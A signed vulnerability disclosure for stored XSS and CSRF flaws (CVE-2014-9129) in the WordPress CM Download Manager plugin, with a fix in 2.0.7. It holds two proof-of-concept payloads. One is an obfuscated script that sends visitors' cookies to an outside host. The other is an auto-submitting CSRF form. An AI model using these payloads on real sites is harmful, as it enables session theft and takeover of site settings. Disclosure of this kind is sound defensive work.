WordPress CM Download Manager 2.0.6 XSS / CSRF

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Product: WordPress plugin cm-download-manager  
Plugin page: https://wordpress.org/plugins/cm-download-manager/  
Vendor: CreativeMindsSolutions http://cminds.com/  
Vulnerability Type: CWE-79: Cross-site scripting  
Vulnerable Versions: 2.0.6 and below  
Fixed Version: 2.0.7  
Solution Status: Fixed by Vendor  
Vendor Notification: 2014-11-27  
Public Disclosure: 2014-12-02  
CVE Reference: N/A. Only assigned for CSRF  
Criticality: Low  
  
Vulnerability details:  
  
CM Download Manager plugin for WordPress contains a flaw that allows a stored  
cross-site scripting (XSS) attack. This flaw exists because the  
/wp-admin/admin.php script does not validate input to the 'addons_title' POST  
parameter before returning it to users. This allows an authenticated remote  
attacker to create a specially crafted request that would execute arbitrary  
script code in a user's browser session within the trust relationship between  
their browser and the server.  
  
Root cause:  
  
The software incorrectly neutralizes user-controllable input before it is placed  
in output that is used as a web page that is served to authenticated users.  
  
Proof-of-concept:  
  
Insert following code to CM Downloads -> Settings -> "Downloads listing title"  
field with CSRF attack.  
  
<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,  
101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,  
116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,  
105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,  
101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,  
112, 116, 62);document.write(foo);</script>  
  
- ---------------  
Product: WordPress plugin cm-download-manager  
Plugin page: https://wordpress.org/plugins/cm-download-manager/  
Vendor: CreativeMindsSolutions http://cminds.com/  
Vulnerability Type: CWE-352: Cross-Site Request Forgery  
Vulnerable Versions: 2.0.6 and below  
Fixed Version: 2.0.7  
Solution Status: Fixed by Vendor  
Vendor Notification: 2014-11-27  
Public Disclosure: 2014-12-02  
CVE Reference: CVE-2014-9129  
Criticality: Low  
  
Vulnerability details:  
  
CM Download Manager plugin for WordPress contains a flaw on the  
CMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do not  
require multiple steps, explicit confirmation, or a unique token when performing  
sensitive actions. By tricking authenticated user into following a specially  
crafted link, a context-dependent attacker can perform a CSRF attack causing the  
victim to insert and execute arbitrary script code.  
  
Root cause:  
  
The web application does not sufficiently verify whether a well-formed, valid,  
consistent request was intentionally provided by the user who submitted the  
request.  
  
Proof-of-concept:  
  
<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3>  
<form id="f1" method="POST"  
action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings">  
<table><input type="text" name="addons_title" value="XSS"></table></form>  
<script type="text/javascript">document.getElementById("f1").submit();</script>  
</body></html>  
  
Notes:  
  
Other pages and/or parameters are also possibly insecure (not tested). Suggested  
to do a proper security audit for their software. Vendor did not mention  
security fix or CVE in ChangeLog even it was discussed several times. References  
below.  
  
Cross-site scripting:  
http://cwe.mitre.org/data/definitions/79.html  
https://scapsync.com/cwe/CWE-79  
https://en.wikipedia.org/wiki/Cross-site_scripting  
  
Cross-Site Request Forgery:  
http://cwe.mitre.org/data/definitions/352.html  
https://scapsync.com/cwe/CWE-352   
https://en.wikipedia.org/wiki/Cross-site_request_forgery  
  
- ---  
Henri Salo  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
  
iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/  
l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT  
=bUVi  
-----END PGP SIGNATURE-----  
`